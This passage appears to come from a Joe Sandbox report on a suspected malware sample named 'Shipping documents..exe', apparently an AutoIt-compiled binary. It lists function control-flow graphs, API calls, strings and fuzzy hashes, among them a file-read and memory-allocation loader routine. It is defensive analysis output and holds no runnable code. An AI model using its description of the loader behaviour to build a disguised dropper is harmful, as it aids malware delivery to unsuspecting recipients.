                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                          • String ID: Include$\
                                                                                                          • API String ID: 3173733714-3429789819
                                                                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                          • _free.LIBCMT ref: 00452A17
                                                                                                          • _free.LIBCMT ref: 00452A20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255752989-0
                                                                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(00C00CA8,000000FF,00000000), ref: 00410552
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00C00CA8,000000FF,00000000), ref: 00410552
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                          • API String ID: 423443420-4155596026
                                                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: Default
                                                                                                          • API String ID: 1579825452-753088835
                                                                                                          • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                          • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1987 425d05-425d0b 1986->1987 1988 40f6dc-40f6df 1986->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1985 1991->1970
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                          • String ID: AU3!$EA06
                                                                                                          • API String ID: 1268643489-2658333250
                                                                                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2016 4011af 2010->2016 2011->2009 2012->2001 2019 401225-42b06d call 468b0e 2012->2019 2017 401163-401166 2013->2017 2018 42b01d-42b024 2013->2018 2016->2001 2022 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2016->2022 2023 4011db-401202 SetTimer RegisterWindowMessageW 2016->2023 2025 42afe9-42b018 call 40f190 call 401a50 2017->2025 2026 40116c-401172 2017->2026 2018->2000 2024 42b02a-42b033 call 4370f4 2018->2024 2019->2009 2023->2009 2032 401204-401216 CreatePopupMenu 2023->2032 2024->2000 2025->2000 2026->2001 2034 401174-42afde call 45fd57 2026->2034 2034->2000 2045 42afe4 2034->2045 2045->2009
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated
                                                                                                          • API String ID: 129472671-2362178303
                                                                                                          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                          • String ID: ,*H$4*H$@fI
                                                                                                          • API String ID: 615853336-1459471987
                                                                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 2065 3eb5258-3eb5306 call 3eb2c48 2068 3eb530d-3eb5333 call 3eb6168 CreateFileW 2065->2068 2071 3eb533a-3eb534a 2068->2071 2072 3eb5335 2068->2072 2077 3eb534c 2071->2077 2078 3eb5351-3eb536b VirtualAlloc 2071->2078 2073 3eb5485-3eb5489 2072->2073 2074 3eb54cb-3eb54ce 2073->2074 2075 3eb548b-3eb548f 2073->2075 2079 3eb54d1-3eb54d8 2074->2079 2080 3eb549b-3eb549f 2075->2080 2081 3eb5491-3eb5494 2075->2081 2077->2073 2082 3eb536d 2078->2082 2083 3eb5372-3eb5389 ReadFile 2078->2083 2084 3eb54da-3eb54e5 2079->2084 2085 3eb552d-3eb5542 2079->2085 2086 3eb54af-3eb54b3 2080->2086 2087 3eb54a1-3eb54ab 2080->2087 2081->2080 2082->2073 2090 3eb538b 2083->2090 2091 3eb5390-3eb53d0 VirtualAlloc 2083->2091 2092 3eb54e9-3eb54f5 2084->2092 2093 3eb54e7 2084->2093 2094 3eb5552-3eb555a 2085->2094 2095 3eb5544-3eb554f VirtualFree 2085->2095 2088 3eb54c3 2086->2088 2089 3eb54b5-3eb54bf 2086->2089 2087->2086 2088->2074 2089->2088 2090->2073 2096 3eb53d2 2091->2096 2097 3eb53d7-3eb53f2 call 3eb63b8 2091->2097 2098 3eb5509-3eb5515 2092->2098 2099 3eb54f7-3eb5507 2092->2099 2093->2085 2095->2094 2096->2073 2105 3eb53fd-3eb5407 2097->2105 2102 3eb5522-3eb5528 2098->2102 2103 3eb5517-3eb5520 2098->2103 2101 3eb552b 2099->2101 2101->2079 2102->2101 2103->2101 2106 3eb543a-3eb544e call 3eb61c8 2105->2106 2107 3eb5409-3eb5438 call 3eb63b8 2105->2107 2112 3eb5452-3eb5456 2106->2112 2113 3eb5450 2106->2113 2107->2105 2115 3eb5458-3eb545c CloseHandle 2112->2115 2116 3eb5462-3eb5466 2112->2116 2113->2073 2115->2116 2117 3eb5468-3eb5473 VirtualFree 2116->2117 2118 3eb5476-3eb547f 2116->2118 2117->2118 2118->2068 2118->2073
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EB5329
                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EB554F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 204039940-0
                                                                                                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                          • Instruction ID: e61e0bbb54dd897c97e3f24ec2d5d008242f7ef7c09744202c0256b67bb1fd77
                                                                                                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                          • Instruction Fuzzy Hash: 91A11674E00209EBDB15CFA4C894BEEB7B5BF49305F249699E201BB2C0D775AA40CF60

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                                                                          APIs
                                                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                          • String ID: C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 3170942423-2870460739
                                                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                                                          Control-flow Graph

                                                                                                          • Basic blocks (address range, notable calls):
                                                                                                            • 2137: 401250-40125c
                                                                                                            • 2138: 401262-401293, call 412f40, call 401b80
                                                                                                            • 2139: 4012e8-4012ed
                                                                                                            • 2144: 4012d1-4012e2, KillTimer, SetTimer
                                                                                                            • 2145: 401295-4012b5
                                                                                                            • 2146: 4012bb-4012bf
                                                                                                            • 2147: 4272ec-4272f2
                                                                                                            • 2148: 4012c5-4012cb
                                                                                                            • 2149: 42733f-427346
                                                                                                            • 2150: 4272f4-427315, Shell_NotifyIconW
                                                                                                            • 2151: 42731a-42733a, Shell_NotifyIconW
                                                                                                            • 2152: 427348-427369, Shell_NotifyIconW
                                                                                                            • 2153: 42736e-42738e, Shell_NotifyIconW
                                                                                                            • 2154: 427393-4273b4, Shell_NotifyIconW
                                                                                                          • Edges: 2137->2138, 2137->2139, 2138->2144, 2138->2145, 2145->2146, 2145->2147, 2146->2148, 2146->2149, 2147->2150, 2147->2151, 2148->2144, 2148->2154, 2149->2152, 2149->2153, 2150->2144, 2151->2144, 2152->2144, 2153->2144, 2154->2144
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
